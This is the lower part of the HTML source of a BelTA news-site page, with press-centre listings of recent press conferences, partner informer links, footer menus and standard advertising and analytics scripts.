                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000106_1517304302_small.jpg" title="Современные методики диагностики и лечения неврологических и нейрохирургических заболеваний"/>
                    <span class="press_rubric">Пресс-конференция</span>
                </span>
                                                                                
                <span> Эдуард Василевич,<br/> Сергей Капацевич,<br/> Елена Веевник,<br/> Владимир Алексеевец</span>
                <span class="press_date "> 2 февраля</span>
                Современные методики диагностики и лечения неврологических и нейрохирургических заболеваний       
                <span class="clear"></span>
            </a>
                                            
                                                            <a href="http://www.belta.by/pressconference/view/itogi-vystuplenija-komandy-maz-sportavto-na-dakare-1009/" title="Итоги выступления команды &quot;МАЗ-СПОРТавто&quot; на &quot;Дакаре&quot;" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000106_1516698200_small.jpg" title="Итоги выступления команды &quot;МАЗ-СПОРТавто&quot; на &quot;Дакаре&quot;"/>
                    <span class="press_rubric">Пресс-конференция</span>
                </span>
                                                                                
                <span> Сергей Вязович,<br/> Александр Василевский,<br/> Алексей Вишневский,<br/> Геннадий Скитов</span>
                <span class="press_date ">26 января</span>
                Итоги выступления команды "МАЗ-СПОРТавто" на "Дакаре"       
                <span class="clear"></span>
            </a>
                                            
                                                            <a href="http://www.belta.by/pressconference/view/zhilischno-kommunalnoe-hozjajstvo-goroda-minska-itogi-i-plany-1006/" title="Жилищно-коммунальное хозяйство города Минска: итоги и планы" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000106_1515671554_small.jpg" title="Жилищно-коммунальное хозяйство города Минска: итоги и планы"/>
                    <span class="press_rubric">Пресс-конференция</span>
                </span>
                                                                                
                <span> Игорь Гончарик,<br/> Юлия Сагайдак,<br/> Игорь Кириленков,<br/> Алла Королюк</span>
                <span class="press_date ">15 января</span>
                Жилищно-коммунальное хозяйство города Минска: итоги и планы       
                <span class="clear"></span>
            </a>
                                            
                                                            <a href="http://www.belta.by/pressconference/view/nastojaschee-i-buduschee-belorusskoj-energetiki-1005/" title="Настоящее и будущее белорусской энергетики" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000106_1513763154_small.jpg" title="Настоящее и будущее белорусской энергетики"/>
                    <span class="press_rubric">Пресс-конференция</span>
                </span>
                                                                                
                <span> Виктор Каранкевич,<br/> Евгений Воронов,<br/> Леонид Рудинский</span>
                <span class="press_date ">21 декабря</span>
                Настоящее и будущее белорусской энергетики       
                <span class="clear"></span>
            </a>
                                            

                </div>
	                <div class="press_wrap press_wrap_active" id="pr_0_info">
            <div class="press_all"><a href="/press-center-info/" title="Пресс-центр">Пресс-центр</a></div>
        	                                                                                    <a href="/onlineconference/view/deklarirovanie-dohodov-grazhdan-1013/" title="Декларирование доходов граждан" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000093_1517820692_small.jpg" title="Декларирование доходов граждан"/>
                    <span class="press_rubric">Онлайн-конференция</span>
                </span>
                                                                                
                <span> Андрей Ковалевский</span>
                <span class="press_date "> 7 февраля, 11:00</span>
                Декларирование доходов граждан       
                <span class="clear"></span>
            </a>
                                            
                                                                            <a href="/pressconference/view/informatsionnaja-bezopasnost-i-borba-s-prestuplenijami-v-sfere-vysokih-tehnologij-1012/" title="Информационная безопасность и борьба с преступлениями в сфере высоких технологий" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000106_1517477497_small.jpg" title="Информационная безопасность и борьба с преступлениями в сфере высоких технологий"/>
                    <span class="press_rubric">Пресс-конференция</span>
                </span>
                                                                                
                <span> Вадим Ипатов,<br/> Владимир Зайцев,<br/> Александр Мохнач</span>
                <span class="press_date "> 5 февраля</span>
                Информационная безопасность и борьба с преступлениями в сфере высоких технологий       
                <span class="clear"></span>
            </a>
                                            
                                                                            <a href="/pressconference/view/sovremennye-metodiki-diagnostiki-i-lechenija-nevrologicheskih-i-nejrohirurgicheskih-zabolevanij-1011/" title="Современные методики диагностики и лечения неврологических и нейрохирургических заболеваний" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000106_1517304302_small.jpg" title="Современные методики диагностики и лечения неврологических и нейрохирургических заболеваний"/>
                    <span class="press_rubric">Пресс-конференция</span>
                </span>
                                                                                
                <span> Эдуард Василевич,<br/> Сергей Капацевич,<br/> Елена Веевник,<br/> Владимир Алексеевец</span>
                <span class="press_date "> 2 февраля</span>
                Современные методики диагностики и лечения неврологических и нейрохирургических заболеваний       
                <span class="clear"></span>
            </a>
                                            
                                                                            <a href="/pressconference/view/itogi-vystuplenija-komandy-maz-sportavto-na-dakare-1009/" title="Итоги выступления команды &quot;МАЗ-СПОРТавто&quot; на &quot;Дакаре&quot;" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000106_1516698200_small.jpg" title="Итоги выступления команды &quot;МАЗ-СПОРТавто&quot; на &quot;Дакаре&quot;"/>
                    <span class="press_rubric">Пресс-конференция</span>
                </span>
                                                                                
                <span> Сергей Вязович,<br/> Александр Василевский,<br/> Алексей Вишневский,<br/> Геннадий Скитов</span>
                <span class="press_date ">26 января</span>
                Итоги выступления команды "МАЗ-СПОРТавто" на "Дакаре"       
                <span class="clear"></span>
            </a>
                                            
                                                                            <a href="/roundtable/view/byt-sobstvennikom-stat-hozjainom-kruglyj-stol-gazety-7-dnej-1010/" title="Быть собственником – стать хозяином. Круглый стол газеты &quot;7 дней&quot;" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000105_1516805866_small.jpg" title="Быть собственником – стать хозяином. Круглый стол газеты &quot;7 дней&quot;"/>
                    <span class="press_rubric">Круглый стол</span>
                </span>
                                                                                
                <span> Евгения Красуцкая,<br/> Геннадий Каленов,<br/> Владимир Устинович</span>
                <span class="press_date ">24 января</span>
                Быть собственником – стать хозяином. Круглый стол газеты "7 дней"       
                <span class="clear"></span>
            </a>
                                            

        	
        	</div>       
</div>
</div>
    <div class="popular_block">
        </div>
    
<style>
    
    /*Yandex. реклама*/
    .yap-yandex_ad-horizontal{background-color: #eff1f3!important;margin-top:30px!important;padding: 20px 15px 10px 25px !important;}
    .yap-yandex_ad-horizontal .yap-layout__wrapper{border:0px!important;border-top:1px solid #d4d6d7!important}
    .yap-yandex_ad-horizontal .yap-logo-block__text{background-color: #d4d6d7!important}
    .yap-yandex_ad-horizontal .yap-layout__logo{background-color: #d4d6d7!important}
    .yap-yandex_ad-horizontal .yap-logo-block__arrow{background-color: #d4d6d7!important;display: none!important}
    .yap-yandex_ad-horizontal, .yap-yandex_ad-horizontal .yap-layout__sitelinks, .yap-yandex_ad-horizontal .yap-layout__schedule, .yap-yandex_ad-horizontal .yap-layout__contacts, .yap-yandex_ad-horizontal .yap-layout__warning{font-size:14px;font-size:0.8725rem}
    .yap-yandex_ad-horizontal .yap-layout__body{font-size:13px;font-size:0.8125rem}
    
</style>
                        <!-- Yandex.RTB R-A-132717-1 -->
<div id="yandex_rtb_R-A-132717-1"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-132717-1",
                renderTo: "yandex_rtb_R-A-132717-1",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>

<script>(function(e){var t="DIV_NNN_"+e+"_"+parseInt(Math.random()*1e3); document.write('<div id="'+t+'" class="nnn-block nnn-block-'+e+'"></div>'); if("undefined"===typeof loaded_blocks_nnn){loaded_blocks_nnn=[]; function n(){var e=loaded_blocks_nnn.shift(); var t=e.adp_id; var r=e.div; var i=document.createElement("script"); i.type="text/javascript"; i.async=true; i.charset="windows-1251"; i.src="//www.nnn.ru/show.cgi?async=1&adp="+t+"&div="+r+"&t="+Math.random(); var s=document.getElementsByTagName("head")[0]||document.getElementsByTagName("body")[0]; s.appendChild(i); var o=setInterval(function(){if(document.getElementById(r).innerHTML&&loaded_blocks_nnn.length){n(); clearInterval(o)}},50)} setTimeout(n)}loaded_blocks_nnn.push({adp_id:e,div:t})})(260036)</script>

            
                
        

 <div class="informer_block">
	
    <div class="informer_item">
                                                            <a  class="informer_title"  href="http://7dney.by/ru/" title="Газета 7 дней" >Газета 7 дней</a>
            
        <div class="informer_inner">
                    	
                <div class="informer_el informer_el_no_icon">
                                                                                                                        <a   href="http://7dney.by/ru/issues?art_id=5500" title="&quot;Магазинные торты я не ем!&quot;" >"Магазинные торты я не ем!"</a>
                        
                </div>
            	
                <div class="informer_el informer_el_no_icon">
                                                                                                                        <a   href="http://7dney.by/ru/issues?art_id=5501" title="Характер на кончиках пальцев" >Характер на кончиках пальцев</a>
                        
                </div>
            	
                <div class="informer_el informer_el_no_icon">
                                                                                                                        <a   href="http://7dney.by/ru/issues?art_id=5499" title="Поручись за меня" >Поручись за меня</a>
                        
                </div>
                            </div>
        <a href="http://7dney.by/ru/" title="Газета 7 дней" class="informer_to_site">На сайт</a>
    </div>
            <div class="informer_empty"></div>
    	
    <div class="informer_item">
                                                            <a  class="informer_title"  href="http://belarus-economy.by" title="Экономика Беларуси"  rel="nofollow"><img src=http://www.belta.by/images/storage/menu/000095_7f52c7ad0c009a154a751df4b7aa4390.png alt="Экономика Беларуси" title="Экономика Беларуси" />Экономика Беларуси</a>
            
        <div class="informer_inner">
                    	
                <div class="informer_el informer_el_no_icon">
                                                                                                                        <a   href="http://belarus-economy.by/ru" title="Банкинг без банков. Анна Кот"  rel="nofollow">Банкинг без банков. Анна Кот</a>
                        
                </div>
            	
                <div class="informer_el informer_el_no_icon">
                                                                                                                        <a   href="http://belarus-economy.by" title="Инновационная активность. Татьяна Власовец"  rel="nofollow">Инновационная активность. Татьяна Власовец</a>
                        
                </div>
            	
                <div class="informer_el informer_el_no_icon">
                                                                                                                        <a   href="http://belarus-economy.by" title="Ростки зеленой экономики. Снежана Михайловская"  rel="nofollow">Ростки зеленой экономики. Снежана Михайловская</a>
                        
                </div>
                            </div>
        <a href="http://belarus-economy.by" title=" Экономика Беларуси" class="informer_to_site">На сайт</a>
    </div>
            <div class="informer_empty"></div>
    	
    <div class="informer_item">
                                                            <a  class="informer_title"  href="http://beldumka.belta.by/" title="Беларуская Думка" ><img src=http://www.belta.by/images/storage/menu/000095_44deed83255f9d2fcbe02ca69b26bbae.png alt="Беларуская Думка" title="Беларуская Думка" />Беларуская Думка</a>
            
        <div class="informer_inner">
                    	
                <div class="informer_el informer_el_no_icon">
                                                                                                                        <a   href="http://beldumka.belta.by/isfiles/000167_449381.pdf" title="Александр ШУМИЛИН. Приоритеты и перспективы" >Александр ШУМИЛИН. Приоритеты и перспективы</a>
                        
                </div>
            	
                <div class="informer_el informer_el_no_icon">
                                                                                                                        <a   href="http://beldumka.belta.by/isfiles/000167_171423.pdf" title="Владимир МОНЗУЛЬ. Мирный атом в БССР" >Владимир МОНЗУЛЬ. Мирный атом в БССР</a>
                        
                </div>
            	
                <div class="informer_el informer_el_no_icon">
                                                                                                                        <a   href="http://beldumka.belta.by/isfiles/000167_627426.pdf" title="Ольга НОВИКОВА, Владимир НОВИКОВ. Хронополитика: концептуальные основания и социальная практика" >Ольга НОВИКОВА, Владимир НОВИКОВ. Хронополитика: концептуальные основания и социальная практика</a>
                        
                </div>
                            </div>
        <a href="http://beldumka.belta.by/" title=" Беларуская Думка" class="informer_to_site">На сайт</a>
    </div>
     </div>

 


<div class="bottom_menu">
        <div class="bottom_menu_left">
	
    <div class="bottom_menu_col">
        <div class="bottom_menu_title">
                                                                                <a   href="http://www.belarus.by/ru/" title="Вся Беларусь"  rel="nofollow">Вся Беларусь</a>
                
        </div>
                                                	
        <div>
                                                                                <a   href="http://www.belarus.by/ru/government" title="Государственное устройство"  rel="nofollow">Государственное устройство</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://www.belarus.by/ru/about-belarus/history" title="История"  rel="nofollow">История</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://www.belarus.by/ru/travel/belarus-life" title="Туризм"  rel="nofollow">Туризм</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://www.belarus.by/ru/about-belarus/culture" title="Культура"  rel="nofollow">Культура</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://www.belarus.by/ru/about-belarus/sport" title="Спорт"  rel="nofollow">Спорт</a>
                
        </div>
                                </div>
	
    <div class="bottom_menu_col">
        <div class="bottom_menu_title">
                                                                                <a   href="http://www.belta.by/" title="Спецпроекты">Спецпроекты</a>
                
        </div>
                                                	
        <div>
                                                                                <a   href="http://peramoga.belta.by/" title="Хроника Победы" >Хроника Победы</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://www.belta.by/posters/" title="Плакаты БелТА">Плакаты БелТА</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://2017.belta.by/" title="События года.2017" >События года.2017</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://belarus-china-25.tilda.ws/" title="Беларусь-Китай ТОП-50 кадров" >Беларусь-Китай ТОП-50 кадров</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://minsk950.belta.by/" title="Минск и Минчане" >Минск и Минчане</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://bylostalo.belta.by/ru/" title="Суверенная Беларусь: Эпоха достижений" >Суверенная Беларусь: Эпоха достижений</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://parad.belta.by/" title="Парад в День Независимости-2017" >Парад в День Независимости-2017</a>
                
        </div>
                                </div>
	
    <div class="bottom_menu_col">
        <div class="bottom_menu_title">
                                                                                <a   href="http://www.belta.by/" title="Клиентам">Клиентам</a>
                
        </div>
                                                	
        <div>
                                                                                <a   href="http://www.belta.by/advertising/" title="Реклама на сайте">Реклама на сайте</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://subs.belta.by/" title="Вход для подписчиков" >Вход для подписчиков</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://www.belta.by/attendance" title="Продукты и услуги" >Продукты и услуги</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://www.belta.by/mediakit/" title="Медиакит">Медиакит</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://develop.belta.by/" title="Разработка сайтов" >Разработка сайтов</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://m.belta.by/" title="Мобильная версия"  rel="nofollow">Мобильная версия</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://www.belta.by/news-informer/" title="Новостной информер">Новостной информер</a>
                
        </div>
                                </div>
	
    <div class="bottom_menu_col">
        <div class="bottom_menu_title">
                                                                                <a   href="http://www.belta.by/" title="Агентство">Агентство</a>
                
        </div>
                                                	
        <div>
                                                                                <a   href="http://www.belta.by/about_agency" title="Об агентстве" >Об агентстве</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://www.belta.by/contacts/" title="Контакты">Контакты</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://elo.belta.by/" title="Электронные обращения" >Электронные обращения</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://www.belta.by/vacancies/" title="Карьера в БелТА">Карьера в БелТА</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://www.belta.by/partners" title="Партнеры" >Партнеры</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://www.belta.by/logo/" title="Логотип БелТА">Логотип БелТА</a>
                
        </div>
                	
        <div>
                                                                                <a   href="http://elo.belta.by/siteerorr" title="Сообщить о работе сайта" >Сообщить о работе сайта</a>
                
        </div>
                                </div>
    
    </div>
	
        <div class="social_footer">
               
                            <div class="social_footer_item">
                    <a href="/rss" title="Rss"  target ="_self">
                        <img src="http://www.belta.by/images/storage/banners/000015_06c67faab12793f011de90a38aef8cf1_work.jpg" alt="Rss" title="Rss" onmouseover="this.src='http://www.belta.by/images/storage/banners/000015_e75332d9759a535dbd02582b38240ace_work.jpg'" onmouseout="this.src='http://www.belta.by/images/storage/banners/000015_06c67faab12793f011de90a38aef8cf1_work.jpg'"/>
                    </a>
                </div>                    
           
                    
                   
                            <div class="social_footer_item">
                    <a href="https://vk.com/beltanews" title="Вконтакте" rel="nofollow"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000015_31db2ca27a159543cf8b7be9caedb706_work.jpg" alt="Вконтакте" title="Вконтакте" onmouseover="this.src='http://www.belta.by/images/storage/banners/000015_a2dbfb573d42641b8066e5225b92011b_work.jpg'" onmouseout="this.src='http://www.belta.by/images/storage/banners/000015_31db2ca27a159543cf8b7be9caedb706_work.jpg'"/>
                    </a>
                </div>                    
           
                    
                   
                            <div class="social_footer_item">
                    <a href="http://www.twitter.com/beltanews" title="twitter"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000015_3a2e0ff45c6c22d43d458776ffe014b0_work.jpg" alt="twitter" title="twitter" onmouseover="this.src='http://www.belta.by/images/storage/banners/000015_5d783aea0f6c76683722fb1ba6c1c1d1_work.jpg'" onmouseout="this.src='http://www.belta.by/images/storage/banners/000015_3a2e0ff45c6c22d43d458776ffe014b0_work.jpg'"/>
                    </a>
                </div>                    
           
                    
                   
                            <div class="social_footer_item">
                    <a href="https://www.instagram.com/beltanews/" title="Instagram" rel="nofollow"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000015_dfb020327a27875950807e5a19ffd020_work.jpg" alt="Instagram" title="Instagram" onmouseover="this.src='http://www.belta.by/images/storage/banners/000015_16d12d0a01989bf60add6345e63d7d6c_work.jpg'" onmouseout="this.src='http://www.belta.by/images/storage/banners/000015_dfb020327a27875950807e5a19ffd020_work.jpg'"/>
                    </a>
                </div>                    
           
                    
                   
                            <div class="social_footer_item">
                    <a href="http://www.youtube.com/user/beltavideo" title="YouTube" rel="nofollow"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000015_d13d4ea0deac25c940a3d9accb7071c8_work.jpg" alt="YouTube" title="YouTube" onmouseover="this.src='http://www.belta.by/images/storage/banners/000015_f1b4133b2972136f56addd2ce6070ed2_work.jpg'" onmouseout="this.src='http://www.belta.by/images/storage/banners/000015_d13d4ea0deac25c940a3d9accb7071c8_work.jpg'"/>
                    </a>
                </div>                    
           
                    
                   
                            <div class="social_footer_item">
                    <a href="https://www.facebook.com/beltanews/" title="facebook" rel="nofollow"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000015_85de3d590e2215f9ee73d91065827c5f_work.jpg" alt="facebook" title="facebook" onmouseover="this.src='http://www.belta.by/images/storage/banners/000015_2dd7ef0e89eb8223de5094653e8e3ca9_work.jpg'" onmouseout="this.src='http://www.belta.by/images/storage/banners/000015_85de3d590e2215f9ee73d91065827c5f_work.jpg'"/>
                    </a>
                </div>                    
           
                    
                   
                            <div class="social_footer_item">
                    <a href="http://ok.ru/beltanews" title="odnoklassniki" rel="nofollow"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000015_b04121f7a43df29677bf43d83d5f7afd_work.jpg" alt="odnoklassniki" title="odnoklassniki" onmouseover="this.src='http://www.belta.by/images/storage/banners/000015_5444909c31e907584930038efb9dec9a_work.jpg'" onmouseout="this.src='http://www.belta.by/images/storage/banners/000015_b04121f7a43df29677bf43d83d5f7afd_work.jpg'"/>
                    </a>
                </div>                    
           
                    
        </div>

    <div class="clear"></div>
</div>
</div>
<div class="footer">    
    <div class="footer_left">БЕЛТА - Новости Беларуси, © Авторское право принадлежит БЕЛТА, 1999-2018гг. 
<div>Гиперссылка на источник обязательна. <a href="/copyrightdoc">Условия использования материалов</a>.
</div> <img alt="" border="0" src="/uploads/images/Sportloto/r.png" /> - размещаются материалы рекламно-информационного характера.<br/>
    
    </div>
    <div class="footer_right">                        <div><SCRIPT type=text/javascript>
  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-6185078-12'],
['_trackPageview'],
['n._setAccount', 'UA-6185078-2'],
['n._setDomainName', 'belta.by'],
['n._addOrganic', 'nova.rambler.ru', 'query'],
['n._addOrganic', 'go.mail.ru', 'q'],
['n._addOrganic', 'nigma.ru', 's'],
['n._addOrganic', 'webalta.ru', 'q'],
['n._addOrganic', 'aport.ru', 'r'],
['n._addOrganic', 'poisk.ru', 'text'],
['n._addOrganic', 'quintura.ru', 'request'],
['n._addOrganic', 'search.qip.ru', 'query'],
['n._addOrganic', 'images.yandex.ru', 'q', true],
['n._addOrganic', 'blogs.yandex.ru', 'text', true],
['n._trackPageview']);
  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async 

= true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + 

'.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; 

s.parentNode.insertBefore(ga, s);
  })();
</SCRIPT>
</div>
            
                        <div><script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-6185078-2', 'auto');
  ga('send', 'pageview');

</script>

<SCRIPT>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-52187409-1', 'belta.by');
  ga('send', 'pageview');

</SCRIPT></div>
            
                        <div><!-- Yandex.Metrika counter -->
<script type="text/javascript">
    (function (d, w, c) {
        (w[c] = w[c] || []).push(function() {
            try {
                w.yaCounter15029098 = new Ya.Metrika({
                    id:15029098,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true
                });
            } catch(e) { }
        });

        var n = d.getElementsByTagName("script")[0],
            s = d.createElement("script"),
            f = function () { n.parentNode.insertBefore(s, n); };
        s.type = "text/javascript";
        s.async = true;
        s.src = "https://mc.yandex.ru/metrika/watch.js";

        if (w.opera == "[object Opera]") {
            d.addEventListener("DOMContentLoaded", f, false);
        } else { f(); }
    })(document, window, "yandex_metrika_callbacks");
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/15029098" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter --></div>
            
                
                
                        <div><!-- (C)2000-2015 Gemius SA - gemiusAudience / belta.by / Home Page -->
<script type="text/javascript">
<!--//--><![CDATA[//><!--
var pp_gemius_identifier = '0sJLy_8uUEwBJbn3B6aYyLR3rmEKwc8i6zHFL6K20BD.E7';
// lines below shouldn't be edited
function gemius_pending(i) { window[i] = window[i] || function() {var x = window[i+'_pdata'] = window[i+'_pdata'] || []; x[x.length]=arguments;};};
gemius_pending('gemius_hit'); gemius_pending('gemius_event'); gemius_pending('pp_gemius_hit'); gemius_pending('pp_gemius_event');
(function(d,t) {try {var gt=d.createElement(t),s=d.getElementsByTagName(t)[0],l='http'+((location.protocol=='https:')?'s':''); gt.setAttribute('async','async');
gt.setAttribute('defer','defer'); gt.src=l+'://gaby.hit.gemius.pl/xgemius.js'; s.parentNode.insertBefore(gt,s);} catch (e) {}})(document,'script');
//--><!]]>
</script>
</div>
            
                
                
                
                
        
</div>
    <div class="clear"></div>
    <a href="http://m.belta.by/world/view/oranzhevyj-uroven-opasnosti-objjavlen-v-madride-iz-za-snegopada-288043-2018/" class="to_full_hid" id="full_bottom" title="Мобильная версия" onclick="delete_cookie('mobile_device')">Мобильная версия</a>
</div>

<!--[if IE]> <style type="text/css">.main_page .sticky_block {margin-left:10px;}</style><![endif]-->
   
<script type="text/javascript">
    
        var notUseCopy = 0;
    
</script>

<script type="text/javascript" src="/jscript/classList.min.js"></script> 

<script type="text/javascript" src="/jscript/scripts.js"></script>
    

        <script type="text/javascript" src="/jscript/jquery-1.11.0.min.js"></script>
        
        <script type="text/javascript" src="/jscript/jquery.bxslider.min.js"></script>
        
        
        
        <script type="text/javascript" src="/jscript/jquery.mCustomScrollbar.concat.min.js"></script>
       

 
        <script type="text/javascript">         
            $(document).ready(function(){
                        
                                                 
                    
                 
                 
                                    $('.last_news_scroll').mCustomScrollbar({
                                mouseWheel:{ scrollAmount: 70 },
                                theme:"minimal-dark"
                        });
                                                    if (document.getElementById('newsCompany')){
                        $('#newsCompany').mCustomScrollbar({
                            theme:"minimal-dark"
                        });
                     }       
                    
                                    for (var i=0; i<scroll_items.length; i++){
                        $("#"+scroll_items[i]).mCustomScrollbar({
                            theme:"minimal-dark"
                        });
                     }
                                                    $('#city_hidden').mCustomScrollbar({
                            theme:"minimal-dark"
                        });
                                                                                    
                                     
                                         });
       
        </script>
        


<script type="text/javascript">
         
$(document).ready(function(){

                   if (navigator.userAgent.match(/msie/i) || navigator.userAgent.match(/trident/i)) {
        $('.left_col_tb').css({"table-layout": "fixed"});
    console.log('IE');

}
          });
         
     </script>
     
<script type="text/javascript">
            window.onload = onLoadSPage;
     </script>

</body>
</html>